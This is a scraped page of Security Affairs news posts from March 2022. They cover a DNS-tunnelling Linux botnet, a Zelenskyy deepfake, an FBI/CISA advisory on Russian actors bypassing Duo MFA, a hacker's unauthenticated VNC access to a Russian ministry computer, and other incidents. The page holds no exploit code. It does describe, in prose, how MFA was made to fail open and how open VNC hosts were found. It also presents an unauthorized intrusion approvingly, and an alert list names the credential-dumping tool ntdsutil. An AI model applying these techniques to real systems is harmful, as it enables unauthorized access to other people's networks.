The SBU has identified and arrested the man and seized his equipment.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Security Service of Ukraine)

The post Ukraine SBU arrested a hacker who supported Russia during the invasion appeared first on Security Affairs.

Categories: Cyber Security News

B1txor20 Linux botnet use DNS Tunnel and Log4J exploit

Thu, 03/17/2022 - 07:16
Researchers uncovered a new Linux botnet, tracked as B1txor20, that exploits the Log4J vulnerability and DNS tunnel.

Researchers from Qihoo 360’s Netlab have discovered a new backdoor used to infect Linux systems and include them in a botnet tracked as B1txor20.

The malware was first spotted on February 9, 2022, when 360Netlab’s honeypot system captured an unknown ELF file that was spreading by exploiting the Log4J vulnerability.

The name B1txor20 is based on the file name “b1t” used for the propagation and the XOR encryption algorithm, and the RC4 algorithm key length of 20 bytes.

The B1txor20 Linux backdoor uses DNS Tunnel technology for C2 communications, below is the list of the main features implemented by the threat:

  • SHELL
  • Proxy
  • Execute arbitrary commands
  • Install Rootkit
  • Upload sensitive information

The researchers also noticed the presence of many developed features that have yet to be used, and some of them are affected by bugs. Experts believe the B1txor20 botnet is under development.

“In short, B1txor20 is a Backdoor for the Linux platform, which uses DNS Tunnel technology to build C2 communication channels. In addition to the traditional backdoor functions, B1txor20 also has functions such as opening Socket5 proxy and remotely downloading and installing Rootkit.” reads the analysis published by the experts.

Once the system has been compromised, the threat connects the C2 using the DNS tunnel and retrieves and executes commands sent by the server. The researchers noticed that the bot supports a total of 14 commands that allows it to execute arbitrary commands, upload system information, manipulate files, starting and stopping proxy services, and creating reverse shells.

“Generally speaking, the scenario of malware using DNS Tunnel is as follows: Bot sends the stolen sensitive information, command execution results, and any other information that needs to be delivered, after hiding it using specific encoding techniques, to C2 as a DNS request; After receiving the request, C2 sends the payload to the Bot side as a response to the DNS request. In this way, Bot and C2 achieve communication with the help of DNS protocol.” continues the analysis.

The post includes additional technical details along with Indicators of Compromise (IoCs) for this threat.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, B1txor20)

The post B1txor20 Linux botnet use DNS Tunnel and Log4J exploit appeared first on Security Affairs.

Categories: Cyber Security News

Russia’s disinformation uses deepfake video of Zelenskyy telling people to lay down arms

Wed, 03/16/2022 - 18:44
Russian disinformation continues, this time it used a deepfake video of Zelenskyy inviting Ukrainians to ‘lay down arms.’

A deepfake video of the Ukrainian president Volodymyr Zelenskyy telling its citizens to lay down arms is the last example of disinformation conducted by Russia-linked threat actors.

The fake video shows President Zelenskyy saying ‘It turned out to be not so easy being the president’.”

“My advice to you is to lay down arms and return to your families. It is not worth it dying in this war. My advice to you is to live. I am going to do the same.” the President says in the fake video.

The quality of the video is very low and it has been easy to debunk it due to the lack of proportion between the president’s face and his body.

“In the clip being shared online, President Zelenskyy’s head is too big for the body it has been digitally attached to. It is also lit differently and sits at an awkward angle.” reported Yahoo News. “You can also see a higher level of pixelation around the fake Zelenskyy’s head compared to its body. A translator working for Sky News said that the voice in the fake video was deeper and slower than Mr Zelenskyy’s normal voice.”

Zelenskyy which has demonstrated an outstanding capability in using the media for his messages has commented on the deepfake on his official Instagram account.

#Ukraine Hackers published a deep fake of @ZelenskyyUa urging citizens to lay down their arms. He responded immediately:
"If I can offer someone to lay down their arms, it's the Russian military.Go home.Because we're home. We are defending our land, our children & our families." pic.twitter.com/TiICf3Z5Te

— Hanna Liubakova (@HannaLiubakova) March 16, 2022

“Good day. As for the latest childish provocation with advice to lay down arms, I only advise that the troops of the Russian Federation lay down their arms and return home.” said the Ukrainian President.

“We are already home, we are defending our land, our children, our families. So, we are not going to lay down any arms until our victory.”

According to the media, threat actors hacked the TV24 Ukrainian TV channel to spread the deepfake video with a written message.

The video became viral on social media, including Facebook. Facebook has quickly removed the deepfake video of the Ukrainian President.

“Earlier today, our teams identified and removed a deepfake video claiming to show President Zelensky issuing a statement he never did,” said Nathaniel Gleicher, the head of security policy at Meta, Facebook’s parent company.

1/ Earlier today, our teams identified and removed a deepfake video claiming to show President Zelensky issuing a statement he never did. It appeared on a reportedly compromised website and then started showing across the internet.

— Nathaniel Gleicher (@ngleicher) March 16, 2022

3/ More about our policy against manipulated media in our community standards: https://t.co/y0iEGbdU8D pic.twitter.com/u4IcXZVne7

— Nathaniel Gleicher (@ngleicher) March 16, 2022

Early this month, the Ukrainian Stratcom Centre, the country’s Centre for Strategic Communications and Information Security warned of Russia’s disinformation using deepfake videos, which could be very difficult to debunk.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Ukraine)

The post Russia’s disinformation uses deepfake video of Zelenskyy telling people to lay down arms appeared first on Security Affairs.

Categories: Cyber Security News

CISA adds 15 new flaws to the Known Exploited Vulnerabilities Catalog

Wed, 03/16/2022 - 17:33
The US Cybersecurity and Infrastructure Security Agency (CISA) added 15 new flaws to its Known Exploited Vulnerabilities Catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added 15 vulnerabilities to its Known Exploited Vulnerabilities Catalog.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

The new vulnerabilities added to the catalog include one SonicWall SonicOS issue, tracked as CVE-2020-5135, and 14 Microsoft Windows flaws addressed between 2016 and 2019.

The CVE-2020-5135 is a stack-based buffer overflow that affects the SonicWall Network Security Appliance (NSA). The vulnerability can be exploited by an unauthenticated HTTP request involving a custom protocol handler.

The flaw resides in the HTTP/HTTPS service used for product management as well as SSL VPN remote access.

All the flaws added in this round have to be addressed by federal agencies by April 5.

The CISA Catalog has reached a total of 504 entries with the latest added issues.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Cisa)

The post CISA adds 15 new flaws to the Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

Categories: Cyber Security News

Russia-linked threats actors exploited default MFA protocol and PrintNightmare bug to compromise NGO cloud

Wed, 03/16/2022 - 09:28
FBI and CISA warn Russia-linked threats actors gained access to an NGO cloud after enrolling their own device in the organization’s Duo MFA.

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA)  warned that Russia-linked threat actors have gained access to a non-governmental organization (NGO) cloud by exploiting misconfigured default multifactor authentication (MFA) protocols and enrolled their own device in the organization’s Cisco’s Duo MFA.

The nation-state actors gained access to the network by exploiting default MFA protocols and the Windows Print Spooler vulnerability, “PrintNightmare” (CVE-2021-34527), reads the advisory.

As early as May 2021, the attackers took advantage of a misconfigured account set to default MFA protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network.

The exploitation of the PrintNightmare flaw allowed the attackers to run arbitrary code with system privileges. Russian state-sponsored cyber actors successfully exploited the vulnerability while targeting an NGO using Cisco’s Duo MFA, enabling access to cloud and email accounts for document exfiltration.

In order to compromise the target network, the attackers conducted a brute-force password guessing attack against an un-enrolled and inactive account. Contrary to best practices recommended, the account was still active in the organization’s Active Directory.

“The victim account had been un-enrolled from Duo due to a long period of inactivity but was not disabled in the Active Directory. As Duo’s default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network.” reads the joint advisory.  

“Using the compromised account, Russian state-sponsored cyber actors performed privilege escalation via exploitation of the “PrintNightmare” vulnerability to obtain administrator privileges.”

Once obtained admin privileges the attackers modified a domain controller file to redirect Duo MFA calls to localhost instead of the legitimate Duo server to prevent the MFA service from contacting its server to validate MFA login.

This trick allowed the attackers to completely disable MFA for active domain accounts because the default policy of Duo for Windows is to “Fail open” if the MFA server is unreachable. 

“After effectively disabling MFA, Russian state-sponsored cyber actors were able to successfully authenticate to the victim’s virtual private network (VPN) as non-administrator users and make Remote Desktop Protocol (RDP) connections to Windows domain controllers [T1133]. The actors ran commands to obtain credentials for additional domain accounts; then using the method described in the previous paragraph, changed the MFA configuration file and bypassed MFA for these newly compromised accounts.” continues the analysis. “The actors leveraged mostly internal Windows utilities already present within the victim network to perform this activity.”

FBI and CISA shared indicators of compromise for the above attack and provided the following recommendations in the join advisory:

  • Enforce MFA for all users, without exception. Before implementing, organizations should review configuration policies to protect against “fail open” and re-enrollment scenarios.
  • Implement time-out and lock-out features in response to repeated failed login attempts.
  • Ensure inactive accounts are disabled uniformly across the Active Directory, MFA systems etc.
  • Update software, including operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching known exploited vulnerabilities, especially critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.
  • Continuously monitor network logs for suspicious activity and unauthorized or unusual login attempts.
  • Implement security alerting policies for all changes to security-enabled accounts/groups, and alert on suspicious process creation events (ntdsutil, rar, regedit, etc.).

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Russia-linked threats actors)

The post Russia-linked threats actors exploited default MFA protocol and PrintNightmare bug to compromise NGO cloud appeared first on Security Affairs.

Categories: Cyber Security News

Hacker breaches key Russian ministry in blink of an eye

Wed, 03/16/2022 - 03:21
In mere seconds, a hacker remotely accessed a computer belonging to a regional Russian Ministry of Health, taking advantage of sloppy cybersecurity practices to expose its entire network.

Original post at https://cybernews.com/cyber-war/hacker-breaches-key-russian-ministry-in-blink-of-an-eye/

Spielerkid89, who wished to remain anonymous, did not intend to harm the organization and left its systems intact. However, his experiment is a perfect example of how poor cyber hygiene can leave organizations vulnerable to cyber attacks.

Russian state-sponsored cyber attacks can be devastating and leave hundreds of thousands of the Kremlin’s foes without water or electricity.

However, evidence suggests that the rogue superstate’s cyber capabilities are as weak as its military stance in Ukraine, especially when met with resistance.

An army of pro-Ukrainian hactivists has already demonstrated how easy it is to take vital Russian services offline or intercept them with anti-war messages.

No wonder Russia has been preparing to cut itself off from the global internet, hoping to move key government institutions to a sovereign Runet – a pan-Russian web limited to the Federation – to make them less prone to cyber attacks.

#Russia began active preparations for disconnection from the global Internet

No later than March 11, all servers and domains must be transferred to the #Russian zone. In addition, detailed data on the network infrastructure of the sites is being collected. pic.twitter.com/wOCdRqOJej

— NEXTA (@nexta_tv) March 6, 2022

Hacker snoops around the key Russian ministry

Spurred into action by the invasion of Ukraine, Spielerkid89 decided to investigate whether he could find Russian IPs with disabled authentication to fool with. By using the Shodan search engine, Spielerkid89 soon discovered an open virtual network computing (VNC) port with disabled authentication.

VNC is a desktop sharing system – you can use it to remotely access your work computer from home or any other location, or allow technical support staff to do likewise.

Ideally, VNC should be used only with authenticated users, such as system administrators. Nobody should access a computer without being properly vetted, but that seems to be a security issue that is often overlooked.

As a result, Spielerkid89 connected to a computer belonging to the Ministry of Health in the Omsk region of Russia. To remotely access a ministry employee’s desktop, the hacker didn’t need any password or authentication – he could access all the files and information on that computer via an open VNC port.

“I was able to access people’s names, other IP addresses pointing to other computers on the network, and financial documents, too,” he said.

The Cybernews research team confirmed that Spielerkid89 did indeed gain access to a computer belonging to this Russian ministry. As mentioned above, it was not his intention to harm the organization, and he left its systems intact.

A simple mistake with colossal effect

Spielerkid89 is not a threat actor, and he didn’t harm the organization – he simply took a few screenshots as proof.

However, his experiment illustrates how easy it is for a malicious hacker to breach an organization. By remotely accessing a computer via an open VNC port with disabled authentication, a criminal could download sensitive files, spy on other computers or servers in the network, set up services to create a backdoor, install malware, remote access Trojans, among other things.

“You can do anything you want, basically with full, unfettered access,” Spielerkid89 explained.

He added that open VNC ports with disabled authentication are common cybersecurity malpractice.

“It was so easy to gain access to these systems. They shouldn’t be there unauthenticated. That’s a serious security breach of assets right there. I didn’t need anything to get it, really,” he said.

The port he used to gain entry and snoop around the Omsk ministry is now closed. However, VNC and the remote desktop protocol (RDP) remain one of the main entry points into an organization.

Information security company SecurityScorecard has developed a machine-learning model that estimates the relative likelihood of a company falling victim to a ransomware attack.

Businesses are most susceptible to such attacks through vulnerabilities that enable remote-code execution, according to the company’s vice president of cyber threat intelligence, Ryan Sherstobitoff.

“The most common ones are RDP and VNC, because access brokers essentially sell those credentials on the dark web, which would then enable a ransomware actor to get in,” he told Cybernews. ”

About the author Jurgita Lapienytė

Original post at https://cybernews.com/cyber-war/hacker-breaches-key-russian-ministry-in-blink-of-an-eye/

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, local Russian Ministry)

The post Hacker breaches key Russian ministry in blink of an eye appeared first on Security Affairs.

Categories: Cyber Security News

CVE-2022-0778 DoS flaw in OpenSSL was fixed

Tue, 03/15/2022 - 18:40
OpenSSL addressed a high-severity denial-of-service (DoS) vulnerability, tracked as CVE-2022-0778, related to certificate parsing.

OpenSSL released updates to address a high-severity denial-of-service (DoS) vulnerability, tracked as CVE-2022-0778, that affects the BN_mod_sqrt() function used when certificate parsing. The flaw was discovered by the popular Google Project Zero researchers Tavis Ormandy.

An attacker can trigger the vulnerability by crafting a malformed certificate with invalid explicit curve parameters.

“The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form.” reads the advisory for this flaw. “It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters.”

The vulnerability impacts OpenSSL versions 1.0.2, 1.1.1 and 3.0, the maintainers of the project addressed the flaw with the release of versions 1.0.2zd (for premium support customers), 1.1.1n and 3.0.2.

The flaw also affects OpenSSL 1.1.0, but it is out of support and no longer receiving updates.

The fix for this flaw was developed by David Benjamin from Google and Tomáš Mráz from OpenSSL.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, DoS)

The post CVE-2022-0778 DoS flaw in OpenSSL was fixed appeared first on Security Affairs.

Categories: Cyber Security News

The German BSI agency recommends replacing Kaspersky antivirus software

Tue, 03/15/2022 - 08:37
German Federal Office for Information Security agency, also known as BSI, recommends consumers not to use Kaspersky anti-virus software.

The German Federal Office for Information Security agency, aka BSI, recommends consumers uninstall Kaspersky anti-virus software. The Agency warns the cybersecurity firm could be implicated in hacking attacks during the ongoing Russian invasion of Ukraine.

According to §7 BSI law, the BSI warns against the use of Kaspersky Antivirus and recommends replacing it asap with defense solutions from other vendors.

Nach §7 BSI-Gesetz warnen wir vor dem Einsatz von Virenschutzsoftware des russischen Herstellers Kaspersky. Wir empfehlen, solche Anwendungen durch Produkte anderer Hersteller zu ersetzen.

Zur Pressemitteilung: https://t.co/VC20wRlj4W #DeutschlandDigitalSicherBSI

— BSI (@BSI_Bund) March 15, 2022

“The Federal Office for Information Security (BSI) warns according to §7BSIlaw before using virus protection software from the Russian manufacturer Kaspersky. the BSI recommends replacing applications from Kaspersky’s virus protection software portfolio with alternative products.” reads the BSI announcement.

The alert pointed out that antivirus software operates with high privileges on machines and if compromised could allow an attacker to take over them. BSI remarks that the trust in the reliability and self-protection of a manufacturer as well as his authentic ability to act is crucial for the safe use of any defense software. The doubts about the reliability of the manufacturer, lead the agency in considering the antivirus protection offered by the vendor risky for the IT infrastructure that uses it.

BSI warns of potential offensive cyber operations that can be conducted with the support of a Russian IT manufacturer, it also explains that the vendor could be forced to conduct attacks or be exploited for espionage purposes without its knowledge.

The message is clear, companies and other organizations should carefully plan and implement the replacement of essential components of their IT security infrastructure.

The German agency also warns of the risks associated with a replacement without preparation that could expose organizations to cyber attacks due to temporary losses in comfort, functionality and safety. 

The United States banned government agencies from using Kaspersky defense solutions since 2017, The company rejected any allegation and also clarified that Russian policies and laws are applied to telecoms and ISPs, not security firms like Kaspersky.

In June 2018, the European Parliament passed a resolution that classifies the security firm’s software as “malicious” due to the alleged link of the company with Russian intelligence.

Some European states, including the UK, the Netherlands, and Lithuania also excluded the software of the Russian firm on sensitive systems.

German authorities linked multiple attacks against Bundestag to Russia, in 2015 a sophisticated attack paralized the lower house of parliament.

In October 2020, the Council of the European Union announced sanctions imposed on Russian military intelligence officers, belonging to the 85th Main Centre for Special Services (GTsSS), for their role in the 2015 attack on the German Federal Parliament (Deutscher Bundestag).

In March 2021, several members of the German Parliament (Bundestag) and other members of the state parliament were hit by a targeted attack allegedly launched by Russia-linked hackers.

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, BSI)

The post The German BSI agency recommends replacing Kaspersky antivirus software appeared first on Security Affairs.

Categories: Cyber Security News

A massive DDoS attack hit Israel, government sites went offline

Mon, 03/14/2022 - 17:51
Many Israel government websites were offline after a cyberattack, defense sources claim that this is the largest-ever attack that hit the country.

Israeli media reported that a massive DDoS attack has taken down many Israel government websites. The Jerusalem Post attributed the attack to an allegedly Iran-linked threat actor that claimed responsibility for the attack.

Multiple ministries were impacted by the attack, including Health, Interior, and Justice, media reported that also the website of the Prime Minister’s office went temporarily off-line.

At the time of this writing, some of the impacted websites are still unreachable.

The defense establishment and the National Cyber Directorate have declared a state of emergency, it is currently working to determine if the attack has caused damages to Israeli critical infrastructure.

“In the past few hours, a denial of service attack against a communications provider was identified. As a result, access to a number of websites, among them government websites, was blocked for a short time. As of now, all of the websites are operational.” said the National Cyber Directorate.

The attack against Israel networks comes after the Iranian state TV announced that Iran had thwarted an attack on the nuclear plant in Fordow.

The tension between Iran and Israel is very high, Teheran has previously accused Israel of orchestrating massive and disruptive attacks against critical infrastructure.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Israel)

The post A massive DDoS attack hit Israel, government sites went offline appeared first on Security Affairs.

Categories: Cyber Security News

Pages